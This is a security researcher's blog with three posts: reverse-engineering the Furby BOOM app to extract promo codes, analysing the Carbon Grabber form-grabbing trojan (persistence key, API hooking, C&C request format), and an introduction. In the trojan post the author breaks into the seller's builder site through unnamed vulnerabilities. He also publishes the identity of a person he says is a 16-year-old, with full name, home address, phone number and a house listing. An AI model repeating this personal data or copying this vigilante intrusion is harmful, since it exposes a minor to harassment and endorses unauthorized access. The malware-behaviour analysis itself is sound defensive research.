Saturday, November 7, 2015

Hacking Furby's Android-app for fun (and profit?)

So yes, this story is about Furby, that little hairy creature that never stop talking and always want you to keep feeding it and play with it all the time. A sort of a modern Tamagotchi.
But why an InfoSec geek like me would wanna write about Furby anyway? Apparently, besides of Furby being a really annoying toy, it's also a very interesting piece of technology! and today's Furbies are more technologically advanced than ever.
In fact, according to Wikipedia, Furby even caused some serious security concerns among intelligence agencies such as the NSA (National Security Agency) since this unique toy comes with several sensors such as Infra-red and a microphone that might possibly cause a leak of highly classified information.

Considering the fact that Furby is intended to be used by 6+ years old kids, this toy is extremely sophisticated in means of the variety of functions it can handle and the different situations it can react to.
Since 1998, when Furby was initially released by Tiger Electronics (these days owned by Hasbro), it underwent several changes while each version technologically outdid its predecessor.
The 2005's Emoto-Tronic Furby, for example, supported voice-recognition and added more complex facial movements, and in the holiday season of 2012 Hasbro released a new Furby with more expressive LCD eyes, a wider range of motions, its own iOS and Android app, and the ability to adapt personality in reaction to user behavior.
Furby's latest version was released in the summer of 2013 and featured a brand new iOS and Android app, called Furby BOOM, with many new features.
The way Furby communicates with those new mobile apps is by basically encoding data into bursts high-pitch frequencies that most of us can't hear (but your dog may, probably) and sending them to the air using a regular speaker. The same technique is done on the mobile devices to receive and send commands to the Furby itself. This technique eliminate any need for modern transmitter/receiver equipment like WiFi/Bluetooth etc…

But wait a second, I got so far talking about Furby's history, and not yet even explained how I found myself trying to hack into Furby's app in the first place!

So to be honest, my ex-girlfriend had a very childish personality, and for some reason she decided she'll do anything to get this ugly pink polka-dots Furby for her birthday. Of course I would never want to disappoint my ex-girlfriend, so I quickly checked Amazon, and at the same day I ordered her the Furby she wanted so much. *Damn, what a mistake*

For a whole week I had to hear this intolerable creature making stupid noises, but at least it kept her quite, just like giving a pacifier to a baby ;-)
Anyway, one day while she was playing with her Furby I decided to let my hacker's mind free and started looking for ways I can hack this toy to do something more useful than just ask for food and make irritating noises all day. Soon enough I found some extremely interesting reverse-engineering and hacking articles that were previously written about it: here, here, here and here.
But then I realized I would have to ruin my ex-girlfriend's brand new toy to actually be able to do anything like that, so I had no choice but to give up on this idea.

Few days later my ex-girlfriend came to me and told me there's a specific section within the Furby BOOM app that she cannot understand how to get through. I quickly looked at it and noticed this section is a "promo section".
Going back a bit - besides of taking care for the Furby, the Furby BOOM app has some side games to keep the players busy. One of those games asks the user to "hatch" eggs. There are all kinds of ways to hatch an egg, but some eggs can only be obtained in special ways – for examples those eggs in the promo section.

To get promo eggs the user will have to first find and then scan a QR code that is unique to a specific promo egg. Those QR codes can be found on several places, some appear on Hasbro's website, some at other partner's websites like "Stardoll", and some require the user to actually buy his Furby from a specific store like "Target", "Amazon" or even from country-specific retailers like "Mighty Ape" in New-Zealand. There are twelve special eggs in total that can be obtained by twelve different QR codes, and in reality it should be impossible to obtain all twelve eggs together.

Any clever player would first try to google for those QR codes, and would easily find some of them on pages like this one. But after digging the web, I was able to find only ten unique QR codes, or maybe eleven, but not the whole twelve. So I was thinking, what can I do to find all of them?

The analysis

Let's first take a look at one QR code.
After decoding the QR code we get a pretty interesting text, a URL to be more accurate:
Accessing this URL from a PC browser would return a 404 Not Found error message. But if we would try to access the same page from a mobile device (or just change our User-Agent), we would be transferred to download the Furby BOOM app from the App store. Interesting fact, but it doesn't really lead us anywhere.
Trying to decode another QR code reveals another URL:
And a third one:

At this point we can already see a clear pattern for the QR codes that starts with a URL to Hasbro's website and ends with 5 chars long alphabetic string. Where can we find the rest you ask? Inside the Furby BOOM's app of course!

Taking a first look at the app's decompiled code might cause a code phobia to some of you, but we are not here to reverse engineer the whole Furby BOOM's app, we are just looking for a way to get past the promo section. One way would be to patch the app once we find that interesting section, but a simpler way would be to look for one or two of the unique codes we already know within the app's code/resources and hopefully find the rest of the codes next to them, that would be an educated guess.

A quick look at the decompiled code revealed that the app makes a use of many different library functions, but doesn't consist a lot of its own unique Java code, and within that code not even one occurrence of the alphabetic codes we are looking for.
Diving deeper into the code revealed a section written in Java that takes care of loading JNI (or Java Native Interface) in the form of .so file (a shared object, dynamically linked library, or just DLL).
Looking at the assets folder, under bin/data/ path, exposed the interesting DLLs, but what can we do with binary files like these? The answer is very simple, we can do whatever we do with any other binary file! That means we can debug the code with a debugger, or we could disassemble it with a disassembler, like IDA Pro for example.
In addition to those files we can see another list of files called sharedassets0.assets.splitXX numbered from 0 to 9. All of those represent a single Unity asset file spitted into 1 MB files.
Unity asset file consists of all kind of resources like Textures, Animations, Shaders, MonoScripts (C#, JavaScript and Boo code) and others. We can easily extracts those resources using a software like "Unity Assets Explorer".
Once we extract those we can use a grep command to search for our unique alphabetic string, and soon enough we find it in one of the resources, prefixed to a string "PROMO_EGG_XXXXX" (the X's represent the codes).
With this information we can just look for all other occurrences of the same string, and indeed it revealed to us all possible promo codes!

All left to do now is to convert each code back to its URL format, generate a QR code out of these URLs, and scan each QR code through the Furby BOOM app.

Below you can find all of the QR codes:


Closing words

There are probably plenty of different ways we could take to achieve our goal, and probably even better useful things we could investigate if we really wanted to hack the Furby or its mobile app, but I decided to stick with my goal and do it in a fast'n'dirty way. Bottom line - it worked! So I was pleased with the result, and this is to prove that not everything must be done from top to bottom every time.

Tuesday, May 13, 2014

Carbon Grabber - Malware to the masses

This story begins with a very eye-catching infographic banner that was posted on Hack Forums at the end of January. The banner was selling a new form-grabber written in C++ that claims to be an x86 & x64 Userkit (Ring 3 Rootkit), fully code-injected (except for x64) and capable of stealing information from the latest versions of the three major web-browsers: Chrome, Firefox and IE.
Back then, the Trojan was offered by his seller, Alex™, as a “beta” version for an extremely cheap price of $75, while noting that the prices will be going up soon.

I didn't find it too interesting and continued on with my cyber-life, until few days ago while investigating a Zeus server I noticed a copy of the same Carbon Grabber panel with a different name - “12AM Form Grabber” (only god knows why they picked that name). It drew my attention and I decided to start and investigate a bit more about this Carbon Grabber.

The investigation started by looking for more information about this project in some hacking forums. I noticed that several different people are claiming to sell/resell it, some sell it under different names like Medusa, and there are even some cracked versions of it, bundled with RAT of course (you can never trust a fraudster).
So I decided to head over to the original thread in HF to see what's new with this project. First thing I noticed is that the price was raised to $300, and that now the post has more than 35 pages. The seller also added a big red warning for his clients that he's the only seller and they shouldn't trust anyone besides of him, because it's impossible to obtain the builder. All of these gave me the impression that this form-grabber is starting to become very popular. I also noticed that the change-log was updated to the following:
Change log:
v0.1: added x86 userkit
v0.2: Fixed a few issues with the panel
v0.3: Fixed startup issues, improved on IE plus halved the size
v0.4: minor fixes
v0.5: major fixes for 32 bit
v0.6: IE fixes as we had some reports of problems with IE11
v0.7: Online builder/updater
v0.8: Fixed an error some users ran into.
v0.9: Windows 8.1 small fix with some dependencies
Online builder/updater he said there? Let's check it out!
On another thread that was opened by the seller he was very proud to present his initiative idea of making this online builder for his Trojan. Of course he didn't provide a link to his builder, but a quick Google search led me to his website:
Unfortunately the registration required a key, and without a user there's nothing much I could do there. So I decided to look for other ways in. First thing I wanted to do is to get CloudFlare's protection out of the way. With some passive DNS magic I was able to get the server's IP address, which turned out to be a Windows 2003 server with XAMPP installed on it.
I knew that XAMPP comes with Webalizer, and surprisingly it was left wide open for everyone to see.
One of the leading URLs there was actually the ZIP file of the web-panel for Carbon Grabber, with ~150 clicks during March and April (That could indicate the number of clients he have). So I grabbed a copy of the panel and continued on because what I really wanted is to get a sample for me to analyze.
While further checking the website I realized two things: First is that the online builder's panel is based on the Carbon's web-panel. The second is that the guy behind it has completely zero knowledge in web-application security.
Without getting too much into details, I was able to find several vulnerabilities and from there to grab myself few good executable samples of the Carbon Formgrabber.
For those of you who want to see the online builder works, here's an instructional video made by the seller that explains the process (supposed to be available only for clients):
If you wonder how it's being done behind the scenes, due to the fact that the C&C URL is saved in a resource inside the executable (will be explained later), my guess is that the PHP calls a ResHacker tool over CLI, reads a stub file, modifies its resource and sends it back to the client. But it could also be hex-modified directly in the bin-content the same way.
Anyone said eval()? :-)

Analysing the executable

Luckily the samples I obtained were taken directly from the panel (so called stub) and were not even packed by any public/private crypter.
Running the sample in my VM revealed a very straight-forward behavior:
The Trojan's process creates an svchost.exe process (while leaving its process running), and uses it to execute a RegSetValue operation to allow the Trojan's persistence with the following reg-key: "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft"  With the value: "C:\Documents and Settings\{USER}\Local Settings\Application Data\svchost.exe".
After that svchost.exe is used to copy the Trojan's executable as a read-only/system/hidden file to "C:\Documents and Settings\Yolo\Local Settings\Application Data\svchost.exe".
When everything is done, the svchost.exe process exit and the Trojan's process is taking care for the form-grabbing, while leaving the Trojan's original file on my desktop.
When running, the Trojan's set its mutex to the string mutex to make sure it's not running twice.
Its form-grabbing capabilities are done by hooking HttpSendRequestA & HttpSendRequestW functions to allow intercepting to POST requests (including requests over SSL) sent by the browser.
Like I mentioned earlier, the Trojan's C&C URL is taken from a resource named l33t (Yeah right...) saved inside the binary:

Seems like the programmer forgot to implement an exception handling, so when the Trojan received no response for the DNS request of the C&C's domain it just crashed the whole browser (that's l33t!).
I had no other choice but to help the Trojan to communicate, so I configured a working domain and tried again. The data was sent to the server in the following format:
GET /path/index.php?a=insert&name=MICROSPO-F5W21&host= HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36 
a = Command
Because the index.php serves both as a panel and as a drop-point for the Trojan, It can take any of the following commands: login|logout|panel|insert|del while insert is the only command a bot can send and the rest are reserved for the administration.
name = Computer-name
host = Accessed URL
post = Grabbed POST data (Encoded with base64)

Another thing I noticed while analysing the binary is the following string that indicates the Project's path on the author's PC: C:\Users\Iden\Documents\Visual Studio 2010\Projects\FormGrabberAlexHF\Release\FormGrabberAlexHF.pdb
Looking for FormGrabberAlexHF in VirusTotal revealed many unpacked beta samples that were uploaded during the first days when this Trojan was published (first sample was sent on 2014-01-20 and the last one on 2014-03-21) - a total of 11 samples, most of them with low detection ratio.
I couldn't find any evidence for privilege-escalation like mentioned by the author.
At this point I decided I had enough and wanted to dig more about the guy who's selling it.

Who are you Alex™?

Although I usually tend not to focus on this part, this time I found it really amusing because the information was so easy to obtain that I decided to make a full link-analysis on that guy, hopefully teaching him a lesson that being a criminal doesn't pay off. So let's begin:
First thing I did was to look for additional forum posts opened by Alex over HF. I was able to find few interesting posts that indicated he's on the fraud business for few years already.
Those are just several of his large projects: GalaxyJDB (or Galaxy Java Drive-By), Bitcoin miner, Terminal Keylogger & OMC Exchange (a marketplace for exchanging Bitoins and OmniCoins, which are used by the HF community).
While looking for more info about the guy I noticed he used to be known as sblfc, which was something that I saw both on his site's Webalizer page, and on his profile in HF:

Additionally, it seemed that the guy has a weird hobby of buying domain names. This is a partial list of the domains he owned and used during his time on HF:

The WHOIS information for all of his online domains appeared to be:
Registrant Name:  Alex B
Registrant Organization: Quick Ware
Registrant Address1:  8 does it matter road
Registrant City:  Liverpool
Registrant State/Province: merseyside
Registrant Postal Code: l17 7ja
Registrant Country:  UNITED KINGDOM
Registrant Country Code: GB
Registrant Phone Number: +44.7543642587
Registrant Email:
But is this information actually real? Well, most of it.
A quick Google search for sblfc led me to an old twitter account he owned, and guess what was his first tweet, which by the way, correlates beautifully with the other information I found:

So nice to meet you, Sasha Bessell. (sblfc is acronym of Sasha Bessell Liverpool F.C.)
Little bit of more digging led me to his Facebook account. To my surprise, Alex turned out to be a 16 years old kid from Liverpool city, a pretty talented kid I must say. But after gaining so much information I just couldn't stop there!
I already knew his name, his age and his general location (even a ZIP code), but that was not enough to get an exact address.
I noticed that on the same Vimeo profile where he had a video that shows his bot's functionlity, he also published a short test video of his GoPro quadcopter.
The video actually shows his neighborhood and his house (Nr. 8 revealed at 2:29, just like mentioned in the WHOIS).
So with some Google Map's magic, I was scanning around the ZIP code area mentioned in the WHOIS and compared it with what I saw over the GoPro video (I tried to explain the process with this cool infographic). After few minutes I was able to locate his exact house's address:
8 Bentley Rd.
Liverpool, L17 7JA

View Larger Map

And if this is not enough, you can even take a look at his house from the inside because Venmore (an estate agent for Liverpool's area) just gives this information free for everyone: Venmore property 2619417
It's just amazing what you can do with the internet these days... ;)

Other interesting/funny findings:

So what we had here is a cheap (in price and in quality) form-grabbing Trojan that is becoming a favorite by the script-kiddies, and one careless kid that is making pretty good profit out of it.
Worth mentioning that Alex was not working alone on this project. He seems to have another anonymous partner for his eCrime business.
But I think we had enough for one day and this is a good time to leave it for law enforcements to do the rest.


C&C Locations:

Update 15 May 2014:
Looks like I'm not the only one that was chasing Mr. Sasha. Only one day after I published this blog, Alex received a very unpleasant visit by the police at his parent's house and posted the image below at HF (forgot to remove image metadata BTW).
The conversation (along with the picture) was removed later on that day and I only noticed it on one of the blogs I'm following, but according to that blog's author it might be related to an illegal use of Blackshades RAT Trojan.
Alex, from the other hand, answered to one of HF users by saying: "Not much has happened so far, hope it stays that way. For now I'm not going to explain what happened, but I will later."

Update 19 June 2014:
I was still following this thing up, and found out that Carbon Grabber's website is down, showing the message: "Dear carbonformgrabber customers Alex has been arrested for unknown reasons. You must now contact the developer directly, skype: tryigb I will be releasing new updated bins to customers."
I really hope not to see that kid coming back with a new nickname. But looks like we have a new target now ;)

Sunday, April 6, 2014

A short introduction to (UPDATED)

Hi there security-geeks!

I have no idea how you found your way into my blog, but if you're already here, please let me introduce it to you.
When I first bought domain name, I was hoping to share all kind of stories about Malware Analysis and botnets' detection, investigation, and infiltration. I was hoping to give you a glimpse to some of the latest cyber security trends that I come across while wandering the cybercrime underground communities, and maybe some other interesting stuff that I encounter in my spare time.
A few years later I realized that I don't really have the time to dedicate to it. And together with the fact that most of my publications contained confidential customers data, I decided to convert this place into a garbage collector for all of my other stories that I ever wanted to share but didn't have the chance.

Who am I?
You can call me BeePi.
Without getting too much into details, I am working as a security and malware researcher in the InfoSec industry for a few years now. The rest of my time is usually wasted on my B.Sc. degree in Computer Science. I also love to travel around the world (for both business and pleasure), ride my motorcycle, diving and hack anything and everything that I come across

So why writing this blog?
Actually, there are so many reasons why NOT to, but I had two reasons in mind when I decided to finally do it:
1) I always wanted my own domain-name :)
2) I see this blog as a great opportunity to share things that are out of my job's scope. It will also let me write everything from my own personal point of view without anyone's modifying it for any reason.

Although I am not going to update this blog on regular basis, I really hope you'll find it interesting enough to keep on coming back from time to time or even subscribe it to your RSS feed.

Cya soon!